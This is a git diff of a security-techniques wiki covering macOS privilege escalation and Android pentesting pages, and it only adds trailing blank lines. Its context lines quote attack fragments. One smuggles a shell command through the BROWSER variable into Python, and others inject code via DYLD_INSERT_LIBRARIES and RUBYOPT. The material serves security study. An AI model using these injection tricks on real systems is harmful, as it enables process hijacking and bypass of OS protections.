diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
index f9639226f..deb4db41a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
@@ -378,3 +378,4 @@ static void customConstructor(int argc, const char **argv) {
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
index 2fe179328..c78575597 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
@@ -1287,3 +1287,4 @@ macos-mig-mach-interface-generator.md
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
index 98ce94863..f0665e6d1 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
@@ -404,3 +404,4 @@ The code generated by MIG also calles `kernel_debug` to generate logs about oper
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
index 9f6a80b62..e7b1552eb 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
@@ -177,3 +177,4 @@ By adhering to these guidelines and utilizing the `threadexec` library, one can
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
index eac7481ad..a20a23073 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
@@ -486,3 +486,4 @@ It's possible to find thee communications using `netstat`, `nettop` or the open
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
index 3e645ea6e..a91d747b4 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
@@ -442,3 +442,4 @@ int main(void) {
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
index fd4eaef8b..2279ec6cb 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
@@ -95,3 +95,4 @@ if ((csFlags & (cs_hard | cs_require_lv)) {
 {{#include ../../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
index 18b978a43..971b7448e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
@@ -292,3 +292,4 @@ int main(int argc, const char * argv[]) {
 {{#include ../../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
index ed3c96237..968740441 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
@@ -125,3 +125,4 @@ Below is a visual representation of the described attack scenario:
 {{#include ../../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
index 3a49edb2f..3b0cd8bd4 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
@@ -174,3 +174,4 @@ Note how interesting is that Android Studio in this example is trying to load th
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
index f6b2801c9..992af9109 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
@@ -339,3 +339,4 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
index 2eace525a..d2964d3f5 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -166,3 +166,4 @@ sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
index 5fc6a3ad9..955253c76 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
@@ -316,3 +316,4 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
index c08fb19e8..82338aa1e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
@@ -72,3 +72,4 @@ For example, if a script is importing **`use File::Basename;`** it would be poss
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md
index 6f40d560e..24e393856 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md
@@ -20,3 +20,4 @@ BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
index 09236a052..acac3c28f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
@@ -33,3 +33,4 @@ RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
index df5a809a8..96f888304 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
@@ -145,3 +145,4 @@ References and **more information about BTM**:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
index 984e79a64..a6adaa2b9 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
@@ -131,3 +131,4 @@ iOS AMFI maintains a lost of known hashes which are signed ad-hoc, called the **
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
index c48c62ea8..5797c9c85 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
@@ -88,3 +88,4 @@ That will fork and exec `/usr/libexec/security_authtrampoline /bin/ls` as root,
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
index f9b0d948e..bb050f707 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
@@ -370,3 +370,4 @@ struct cs_blob {
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
index a0e2a2529..c41fd2993 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
@@ -171,3 +171,4 @@ Allow the process to **ask for all the TCC permissions**.
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
index 6de0e5c0f..e037af877 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
@@ -469,3 +469,4 @@ This feature is particularly useful for preventing certain classes of security v
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
index b16e59911..1f01dd1e6 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
@@ -182,3 +182,4 @@ xattr -l protected
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
index 9ce8be51f..e9e29b796 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@@ -476,3 +476,4 @@ In an ".app" bundle if the quarantine xattr is not added to it, when executing i
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
index a5c2c1351..fe417ba0e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
@@ -178,3 +178,4 @@ Even if it's required that the application has to be **opened by LaunchService**
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
index fa4bbbbb8..2124c1639 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
@@ -253,3 +253,4 @@ __END_DECLS
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
index 79897f40a..ba7e843fc 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
@@ -401,3 +401,4 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple.
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md
index 01de795a5..9efff6470 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md
@@ -115,3 +115,4 @@ codesign --remove-signature SandboxedShellApp.app
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 51df66ce3..431cc6ffb 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -501,3 +501,4 @@ Process 2517 exited with status = 0 (0x00000000)
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
index 2a0d99993..b2f0de94e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
@@ -52,3 +52,4 @@ The thing is that even if **`python`** was signed by Apple, it **won't execute**
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
index 2993f64e6..88331bd86 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
@@ -281,3 +281,4 @@ mount
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
index 858fcb764..ebea24ebd 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
@@ -604,3 +604,4 @@ macos-tcc-bypasses/
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
index ab64a70d7..20660737e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
@@ -22,3 +22,4 @@ Sandboxed applications requires privileges like `allow appleevent-send` and `(al
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
index 2729a908a..ac90516c3 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
@@ -538,3 +538,4 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
index ef80f65fd..6b96ba343 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
@@ -34,3 +34,4 @@ However, there are still some tools that can be used to understand this kind of
 {{#include ../../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
index 0759672ab..c425f520a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
@@ -930,3 +930,4 @@ int main() {
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/misc/references.md b/src/misc/references.md
index 554fdab52..7b4e414f8 100644
--- a/src/misc/references.md
+++ b/src/misc/references.md
@@ -49,3 +49,4 @@
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md
index c5e8a0a8d..ebe647a79 100644
--- a/src/mobile-pentesting/android-app-pentesting/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/README.md
@@ -777,3 +777,4 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/adb-commands.md b/src/mobile-pentesting/android-app-pentesting/adb-commands.md
index 0f5b642fc..0b797b0c2 100644
--- a/src/mobile-pentesting/android-app-pentesting/adb-commands.md
+++ b/src/mobile-pentesting/android-app-pentesting/adb-commands.md
@@ -354,3 +354,4 @@ If you want to inspect the content of the backup:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 13a5ccdfe..42c34af7f 100644
--- a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -398,3 +398,4 @@ if (dpm.isAdminActive(adminComponent)) {
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
index ce6c2fdff..f8f07c062 100644
--- a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
+++ b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
@@ -47,3 +47,4 @@ To prevent such attacks, developers can set `taskAffinity` to an empty string an
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
index bbb22c67e..a8297f7ed 100644
--- a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
+++ b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
@@ -62,3 +62,4 @@ This tool can be used to dump the DEX of a running APK in memory. This helps to
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index fff2a263f..b265cc693 100644
--- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -230,3 +230,4 @@ You can **use the GUI** to take a snapshot of the VM at any time:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
index fe8a5153a..97ec547f9 100644
--- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
+++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
@@ -78,3 +78,4 @@ There are specialized tools and scripts designed to test and bypass authenticati
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
index 896de67f0..2932c02db 100644
--- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md
+++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
@@ -92,3 +92,4 @@ Proof-of-Concept HTML:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
index 26645f424..6a7070c34 100644
--- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
@@ -299,3 +299,4 @@ run app.package.debuggable
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
index d5c747d52..e536d791e 100644
--- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -202,3 +202,4 @@ Vulnerable Providers:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
index b751a9065..d080e52f1 100644
--- a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
+++ b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
@@ -91,3 +91,4 @@ This example demonstrated how the behavior of a debuggable application can be ma
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
index 0bd758a23..533715b89 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
@@ -205,3 +205,4 @@ Java.choose("com.example.a11x256.frida_test.my_activity", { {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
index 731cee432..78971dcec 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
@@ -137,3 +137,4 @@ You can see that in [the next tutorial](frida-tutorial-2.md). {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
index 46514f83a..395826357 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
@@ -221,3 +221,4 @@ There is a part 5 that I am not going to explain because there isn't anything ne {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
index 198f670e2..32d3f5455 100644
